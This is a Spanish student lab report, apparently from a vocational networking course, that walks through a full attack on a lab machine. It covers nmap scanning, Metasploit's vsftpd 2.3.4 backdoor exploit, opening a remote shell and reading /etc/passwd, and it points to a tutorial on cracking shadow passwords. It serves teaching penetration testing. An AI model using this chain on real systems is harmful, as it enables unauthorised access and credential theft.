1. Miguel Ángel Marchal Barrera
COLEGIO CIUDAD DE LOS MUCHACHOS SISTEMAS MICROINFORMÁTICOS Y REDES CURSO 2016/2017
EXPLOTACIÓN SISTEMA OPERATIVO
2. PÁGINA 1|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
IDENTIFICACIÓN DEL OBJETIVO
Comprobar si tenemosacceso a la máquina que queremosatacar
Comandoping+ direccióndel interfazde red
Abrirel terminal de Kali-linux
Introducir:ping192.168.1.104 (esla direccióndel equipoaatacar)
Si tenemosconectividad nose perderáningúnpaquete enviado
Detectar los equiposactivos de la red
Comandonmap –sP + direcciónde red
Introducir:nmap–sP 192.168.1.0/24
Escaneala red enbusca de losequiposque estánfuncionandoenlaLAN mostrandolasMAC y
lasdireccionesIPde cada equipo.
3. PÁGINA 2|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
ANÁLISIS DE PUERTOS Y SERVICIOS
Identificaciónde puertosque usa la máquina
Comandonmap –sT -O+ direccióndel interfazde red
Introducir:nmap –sT -O192.168.1.104
Muestra lospuertosque utilizanlamáquinay laversióndel sistemaoperativo
4. PÁGINA 3|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
Comprobar versionesde servicios
Comandonmap –sT –sV direccióndel interfazde red
Introducir:nmap –sT –sV 192.168.1.104
Muestra puertosabiertos,serviciosyversionesde éstos.
Comprobar versionesde serviciosmediante comando telnet
Comandotelnet+IP del interfazde red+ puertoabierto
Introducir:telnet192.168.1.104 21
Muestra laversióndel serviciodelpuertoseleccionado parasabersi esposible que exista
algunavulnerabilidadenlaversión.
5. PÁGINA 4|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
Conexióna través del servicioseleccionado
Comandotelnet,FTPySSH
Accesocon comandotelnet
Comandotelnet+IP interfazde red
Introducir:telnet192.168.1.104
Accedemosala máquinaymuestrael interfazde textopidiendologin desconocido.
Accesocon comandoFTP
Comandoftp + IPinterfazde red
Introducir:ftp192.168.1.104
Accesomediante servicioftppidiendocontraseña desconocida.
Accesocon comandoSSH
Comandossh + IP interfazde red
Introducir:ssh 192.168.1.104
Accesomediante serviciosshpidiendocontraseña desconocida.
6. PÁGINA 5|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
ANÁLISIS DE VULNERABILIDADES
Herramientametasploit
Iniciarla herramientaintroduciendo:msfconsole
Comprobarlos exploitsde laversiónque puedenhacervulnerable el accesoporel servicio
Introducircomando:searchftp
Lista de exploitsque podemosutilizarparaaccederde modo remotoa la máquinaque
queremosatacar.
7. PÁGINA 6|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
EXPLOTACIÓN DE VULNERABILIDADES
Localizamosel xploitpreparadoparaatacar
Este exploitnosinformaque es excelente parausar.
Para usar el xploit
Comandouse + direccióndel exploit
Introducir:use exploit/unix/ftp/vsftpd_234_backdoor
Comprobarla configuraciónde parámetros
Comandoshowoptions
Introducir:showoptions
Se compruebasi se necesitaalgunaconfiguraciónadicional parausarel exploit,necesitaremos
configurarel RHOST asignandolaIPde lamáquinaatacada.
RHOST: Remote Host.
RPORT: Remote Port.
ConfiguraciónRHOST
ComandosetRHOST + direccióndel interfazde red
Introducir:setRHOST 192.168.1.104
8. PÁGINA 7|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
Buscar payloaddisponible
Comandoshowpayloads
Introducir:showpayloads
Muestra el disponible
Utilizarel payloaddisponible
Comandosetpayload + payloaddisponible
Introducir:setpayloadcmd/unix/interact
Accederremotamente alamáquina
Comandoexploit
Introducior:exploit
Accesopermitidoremotoalamáquinaatacada.
Con este últimocomandohabremosaccedidoalamáquinafinalmente,sinnecesidadde login
de ningúntipoy se podrá accedera losdirectoriosyarchivosde maneratransparante.
9. PÁGINA 8|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
POST-EXPLOTACIÓN DEL SISTEMA
Uso de comandoscomosi estuviéramosenlamismamáquina.
Comandols
Directoriosde laraíz de la máquinaatacada.
10. PÁGINA 9|9
MIGUEL ÁNGELMARCHAL BARRERA 2SMR C.MUCHACHOS
Obtenciónde contraseña
Comandocat
Introducir:cat etc/passwd
La estructuraes:
<nombre>,<password><uid>, <gid>,<descripción opcional> <carpeta>, <shell>
<nombre>: Nombre de usuario.
<password>: Si es igual a “x” la contraseña está almacenada en /etc/shadow, si es igual a “!” el
usuario está bloqueado y si es igual a “!!” no tiene contraseña.
<uid>: Número de identificador, para root 0, para los demás un número entre 1 y 65535.
<gid>: Grupo al que está asignado.
<descripción opcional>: Descripción añadida al perfil de usuario.
<carpeta>: Carpeta de inicio de usuario de cada usuario.
<shell>: Intérprete de línea de comandos de Linux.
Con esto no descifraremos la contraseña, sólo veremos los usuarios configurados, ésta está
alojada en etc/shadowy está encriptada, para ello existen herramientas y tutoriales paso a
paso para descifrarlas, en este link se explica cómo.
https://www.youtube.com/watch?v=DntHkcbq-wY